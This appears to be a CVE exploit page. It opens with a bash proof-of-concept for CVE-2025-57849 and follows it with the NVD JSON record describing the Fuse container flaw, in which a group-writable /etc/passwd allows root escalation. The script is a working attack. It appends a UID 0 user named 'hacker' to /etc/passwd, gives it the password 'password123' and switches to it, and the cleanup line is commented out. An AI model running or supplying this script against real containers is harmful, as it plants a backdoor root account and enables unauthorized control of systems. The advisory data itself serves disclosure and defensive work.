CVE-2025-57849

#!/bin/bash # CVE-2025-57849 PoC - Container Privilege Escalation via /etc/passwd # Prerequisites: Non-root user with root group membership in affected Fuse container # Step 1: Verify current user and group membership echo "[+] Current user: $(whoami)" echo "[+] Groups: $(id)" # Step 2: Check /etc/passwd permissions (should be group-writable if vulnerable) echo "[+] Checking /etc/passwd permissions:" ls -la /etc/passwd # Step 3: Check if /etc/passwd is group-writable if [ -w /etc/passwd ]; then echo "[+] /etc/passwd is writable! Proceeding with exploitation..." # Step 4: Create new root user by adding entry to /etc/passwd # Format: username:password_hash:UID:GID:comment:home:shell # Create user 'hacker' with UID 0 (root) echo "hacker:x:0:0:root:/root:/bin/bash" >> /etc/passwd # Step 5: Set password for the new root user echo "hacker:password123" | chpasswd echo "[+] Root user 'hacker' created successfully!" # Step 6: Verify the new user exists echo "[+] Verifying user creation:" grep "hacker" /etc/passwd # Step 7: Switch to root user echo "[+] Switching to root user..." su - hacker else echo "[-] /etc/passwd is not writable. System may not be vulnerable." fi # Cleanup: Remove created user (for testing purposes) # sed -i '/^hacker:/d' /etc/passwd

{"cve": {"id": "CVE-2025-57849", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:52.313", "lastModified": "2026-03-16T14:54:11.293", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A container privilege escalation flaw was found in certain Fuse images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container."}, {"lang": "es", "value": "Se encontró una falla de escalada de privilegios de contenedor en ciertas imágenes de Fuse. Este problema se deriva de que el archivo /etc /passwd se crea con permisos de escritura para el grupo durante el tiempo de compilación. En ciertas condiciones, un atacante que puede ejecutar comandos dentro de un contenedor afectado, incluso como un usuario no-root, puede aprovechar su pertenencia al grupo root para modificar el archivo /etc /passwd. Esto podría permitir al atacante añadir un nuevo usuario con cualquier UID arbitrario, incluyendo el UID 0, lo que lleva a privilegios de root completos dentro del contenedor."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-57849", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391100", "source": "[email protected]"}]}}